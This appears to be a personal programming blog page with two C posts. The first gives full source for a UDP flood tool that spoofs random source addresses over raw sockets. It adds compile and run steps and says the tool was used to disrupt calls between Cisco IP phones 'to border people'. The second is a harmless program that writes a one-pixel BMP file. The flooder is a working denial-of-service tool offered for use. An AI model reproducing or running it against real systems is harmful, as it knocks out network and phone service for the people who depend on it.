We are conspiracy
Posts tagged c
UDP Flooder in C
0737 jours
Yesterday we where still working on some attacks on our bench test and we tried some exploit on the phones
that we found on the internet. Most of them where making some DDOS on the phone but they also blocked them
this means that when people will try to phone … they will discover the phone freezing … then i made up with my
friend some modifications on some code that I had from a few years ago in C a UDP flooder.
This is sending UDP on random ports to a specific address with a random source … and only working on linux.
the code help us to stop the connection between the 2 phones.
The one is trying to reach the other one … but the other one is too busy to answer all the « pings » and send them
to random addresses that he cannot answer.
We also discovered that when the connection between the 2 phones is established the phone
is not affected.
here his the code.
#include <stdio.h> // printf/fprintf
#include <stdlib.h>
#include <string.h>
#include <netinet/ip.h> // struct ip
#include <sys/socket.h> // socket()
#include <netinet/in.h> // struct sockadd
#define __FAVOR_BSD
#define _USE_BSD
#include <netinet/udp.h> // struct udp
#define PADDING_SIZE 1
#define N_LOOP 10
#define U_WAITING 100000
void udp(char *);
unsigned short int in_chksum (unsigned short int *, int);
unsigned long hasard(unsigned long, unsigned long);
main() {
srand(time(NULL));
int i;
for(i=0;i<N_LOOP;i++)
{
udp("xxx.xxx.xxx.xxx");
usleep(U_WAITING);
printf("-");
udp("xxx.xxx.xxx.xxx");
usleep(U_WAITING);
printf("+");
}
}
void udp(char *cible) {
int sd;
sd = socket(AF_INET, SOCK_RAW, IPPROTO_RAW);
if (sd == -1) {
fprintf(stderr,"socket() error, root ?\n");
}
unsigned long ip_src = hasard(4294967295/2,4294967295);
unsigned long ip_dst = inet_addr(cible);
unsigned short p_src = (unsigned short) hasard(0,65535);
unsigned short p_dst = (unsigned short) hasard(0,65535);
struct sockaddr_in sin;
sin.sin_family = AF_INET;
sin.sin_port = p_dst;
sin.sin_addr.s_addr = ip_dst; // dst
struct ip *ip;
struct udphdr *udp;
char *dgm, *data;
int pksize = sizeof(struct ip) + sizeof(struct udphdr) + PADDING_SIZE;
dgm = (char *) malloc(pksize);
ip = (struct ip *) dgm;
udp = (struct udphdr *) (dgm + sizeof(struct ip));
data = (char *) (dgm + sizeof(struct ip) + sizeof(struct udphdr));
memset(dgm, 0, pksize);
memcpy((char *) data, "G", PADDING_SIZE);
int un = 1;
if (setsockopt(sd, IPPROTO_IP, IP_HDRINCL, (char *)&un, sizeof(un)) == -1)
{
fprintf(stderr,"setsockopt()");
exit(-1);
}
//entete ip
ip->ip_v = 4;
ip->ip_hl = 5;
ip->ip_tos = 0;
ip->ip_len = sizeof(pksize);
ip->ip_ttl = 255;
ip->ip_off = 0;
ip->ip_id = sizeof( 45 );
ip->ip_p = IPPROTO_UDP;
ip->ip_sum = 0; // a remplir aprés
ip->ip_src.s_addr = ip_src;
ip->ip_dst.s_addr = ip_dst;
//entete udp
udp->uh_sport = p_src;
udp->uh_dport = p_dst;
udp->uh_ulen = htons(sizeof(struct udphdr ) + PADDING_SIZE);
udp->uh_sum = 0;
// envoi
if (sendto(sd, dgm, pksize, 0, (struct sockaddr *) &sin,
sizeof(struct sockaddr)) == -1) {
fprintf(stderr,"oops, sendto() error\n");
}
//libere la memoire
free(dgm);
close(sd);
}
u_short in_chksum (u_short *addr, int len) // taken from papasmurf.c
{
register int nleft = len;
register u_short *w = addr;
register int sum = 0;
u_short answer = 0;
while (nleft > 1)
{
sum += *w++;
nleft -= 2;
}
if (nleft == 1)
{
*(u_char *)(&answer) = *(u_char *)w;
sum += answer;
}
sum = (sum >> 16) + (sum + 0xffff);
sum += (sum >> 16);
answer = ~sum;
return(answer);
}
unsigned long hasard(unsigned long min, unsigned long max){
return (u_long) (min + ((float) rand() / RAND_MAX * (max - min + 1)));
}
this is quiet good working to border people without affecting the phone.
you can easily compile it with the following command :
gcc -o udp udp.c
and run it with
./udp
if everything is working you should see
+-+-+-
this is appearing during the running time.
we tested it on 7940 phones from cisco and it was good working … soon we will publish some new code.
Have fun.
Creating one Pixel in a BMP in C
2754 jours
This thing is totally USELESS ! but i spend almost 3 day’s on it 
reading how BMP are made and to understand every parts of the BMP
header !
IF you’r looking good the pixel is there ====> above 
I wanted something more easy than what i found on wikipedia for sample
in C so i wrote my own code … this is just useless and make only one red
pixel in a bmp file ( this will probably evolute to something better later )
but right now there is a pixel.
so this is the code
#include
int main(void){
FILE *f;
int filesize = 54 + 3*1*1;
unsigned char bmpfileheader[14] = {'B','M', 0,0,0,0, 0,0,0,0, 54,0,0,0};
unsigned char bmpinfoheader[40] = {40,0,0,0, 0,0,0,0, 0,0,0,0, 1,0, 24,0};
unsigned char bmpcontent[6] = {0,0,255};
unsigned char bmppad[3] = {0,0,0};
/* Construct header with filesize part */
bmpfileheader[ 2] = (unsigned char)(filesize );
bmpfileheader[ 3] = (unsigned char)(filesize>> 8);
bmpfileheader[ 4] = (unsigned char)(filesize>>16);
bmpfileheader[ 5] = (unsigned char)(filesize>>24);
/* Construct header with width and height part */
bmpinfoheader[ 4] = (unsigned char)( 1 );
bmpinfoheader[ 8] = (unsigned char)( 1 );
f = fopen("test.bmp","wb");
fwrite(bmpfileheader,1,14,f);
fwrite(bmpinfoheader,1,40,f);
fwrite(bmpcontent,3,6,f);
fclose(f);
return 1;
}
yes this code is totally not commented and will not be !
why ? because i’m actually lazy and if you want more some information on this … you can just contact me.
have a nice programming night.